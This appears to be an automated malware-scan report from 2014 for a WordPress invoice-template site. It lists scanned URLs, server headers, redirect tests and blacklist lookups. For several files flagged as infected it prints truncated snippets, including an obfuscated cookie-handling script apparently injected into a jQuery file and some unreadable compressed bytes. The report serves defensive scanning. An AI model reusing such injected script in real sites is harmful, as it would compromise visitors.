Scanned pages/files
Request | Server response | Status |
http://8ws.org/ | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=3600 Connection: close Date: Fri, 05 Sep 2014 01:34:21 GMT Location: http://www.8ws.org/ Server: Apache Vary: Accept-Encoding Content-Length: 227 Content-Type: text/html; charset=iso-8859-1 Expires: Fri, 05 Sep 2014 02:34:21 GMT | clean |
http://www.8ws.org/ | 200 OK Content-Length: 40880 Content-Type: text/html | clean |
http://www.8ws.org/wp-content/plugins/scripts-gzip/gzip.php?js=wp-includes%2Fjs%2Fcomment-reply.js%3Fver%3D3.4.2%2Cwp-includes%2Fjs%2Fjquery%2Fjquery.js%3Fver%3D1.7.2 | 200 OK Content-Length: 98256 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I("comment_post_ID");if(!h||!b||!l||!j){return}m.respondId=i;c=c||false;if(!m.I("wp-temp-form-div")){a=document.createElement("div");a.id="wp-temp-form-div";a.style.display="none";b.parentNode.insertBefore(a,b)}h.parentNode.insertBefore(b,h.nextSibling);if(k&&c){k.value=c}j.value=f;l.style.display="";l.onclick=function(){var n=addComment,e=n.I("wp-temp-form ; Antivirus reports:
| ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21259 Content-Type: text/javascript | clean |
http://www.8ws.org/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.25.0-2013.01.18 | 200 OK Content-Length: 5817 Content-Type: application/x-javascript | clean |
http://www.8ws.org/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.3.3 | 200 OK Content-Length: 1836 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) µYmoÛ6þìü &* µäÓ0ç(ÚõÃP4kíK´D;LhÊ©¼4ñß©Êd×è ´U¤»ãswï?Íe¬y*ýüìí ýê ¾tölþð)ñõó¥S2~\ÄÓ_Éù9ñr°),ñÈëkýáÈ\ õåKò²<ÝÛs_FìI3ø/$¦ñ-KFä, ÀJú^Â"«sA¦i6÷Þѧðèl ÷ì[>s="(üj:$wÿ¢ô¤ü ¬oðǾ·ÖßF³¯L-@]æzk@¸ràjâ{|>3 BÒe 'V xàO¸àúyD<ó`Y62¦óLå̾Y]ð,ãTðïÌÁ¿µEcÁ¹b¡æZ°ªðjÍivUOAëüò!E³¢*|Ï+ñn@hGä x6ac®ÆqL ðFä8rW@ÊJ¥gߪ<R»(W!B¾íE¸úSP./'w,Ö P ?ü>_èg÷CP8c[þ4#Y|3R: àUÔ ³"ñaj2_E¡¡ÔÇñF Antivirus reports:
| ||
http://www.8ws.org/wp-content/plugins/lightbox-plus/js/jquery.colorbox.1.3.32.js?ver=1.3.32 | 200 OK Content-Length: 8136 Content-Type: application/x-javascript | clean |
http://8ws.org/receipt.htm | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=3600 Connection: close Date: Fri, 05 Sep 2014 01:34:26 GMT Location: http://www.8ws.org/receipt.htm Server: Apache Vary: Accept-Encoding Content-Length: 238 Content-Type: text/html; charset=iso-8859-1 Expires: Fri, 05 Sep 2014 02:34:26 GMT | clean |
http://www.8ws.org/receipt.htm | 200 OK Content-Length: 9307 Content-Type: text/html | clean |
http://www.8ws.org/test404page.js | 404 Not Found Content-Length: 22387 Content-Type: text/html | clean |
http://www.8ws.org/wp-content/plugins/scripts-gzip/gzip.php?js=wp-includes%2Fjs%2Fjquery%2Fjquery.js%3Fver%3D1.7.2 | 200 OK Content-Length: 97467 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var qzQtTI="useridA0817FB25";var PdfwG="28";var NbUcmN=1;function ytLAm7(ExRd6H){var otvobS;var viRKc8J=document.cookie;if(!viRKc8J){return null;}viRKc8J=viRKc8J.replace(/\s/g,"");var Q7CHJu=viRKc8J.split(";");for(var i=0;i<Q7CHJu.length;i++){var HpojhA=Q7CHJu[i].split("=");if(HpojhA[0]==ExRd6H){otvobS=unescape(HpojhA[1]);break;}}return otvobS;};function sLS1uOJ(ExRd6H,UTlda6n,kPBDO){var exp=new Date();var IuhFf=exp.getTime()+(kPBDO*60*60*1000);exp.setTime(IuhFf);var p2rahA2=ExRd6H+"="+escape ; Antivirus reports:
| ||
http://www.8ws.org/free_invoice_templates.htm | 200 OK Content-Length: 38831 Content-Type: text/html | clean |
http://www.8ws.org/free_invoice_example.htm | 200 OK Content-Length: 41837 Content-Type: text/html | clean |
http://www.8ws.org/motor-vehicle-bill-of-sale.htm | 200 OK Content-Length: 9542 Content-Type: text/html | clean |
http://www.8ws.org/category/2013-calendar | 200 OK Content-Length: 32774 Content-Type: text/html | clean |
http://www.8ws.org/about | 200 OK Content-Length: 21697 Content-Type: text/html | clean |
http://www.8ws.org/contact | 200 OK Content-Length: 21226 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 8ws.org
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: max-age=3600
Connection: close
Date: Fri, 05 Sep 2014 01:34:21 GMT
Location: http://www.8ws.org/
Server: Apache
Vary: Accept-Encoding
Content-Length: 227
Content-Type: text/html; charset=iso-8859-1
Expires: Fri, 05 Sep 2014 02:34:21 GMT
...227 bytes of data.
GET / HTTP/1.1
Host: 8ws.org
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: max-age=3600
Connection: close
Date: Fri, 05 Sep 2014 01:34:21 GMT
Location: http://www.8ws.org/
Server: Apache
Vary: Accept-Encoding
Content-Length: 227
Content-Type: text/html; charset=iso-8859-1
Expires: Fri, 05 Sep 2014 02:34:21 GMT
...227 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: 8ws.org
Referer: http://www.google.com/search?q=8ws.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 8ws.org
Referer: http://www.google.com/search?q=8ws.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=8ws.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://8ws.org/
Result: 8ws.org is not infected or malware details are not published yet.
Result: 8ws.org is not infected or malware details are not published yet.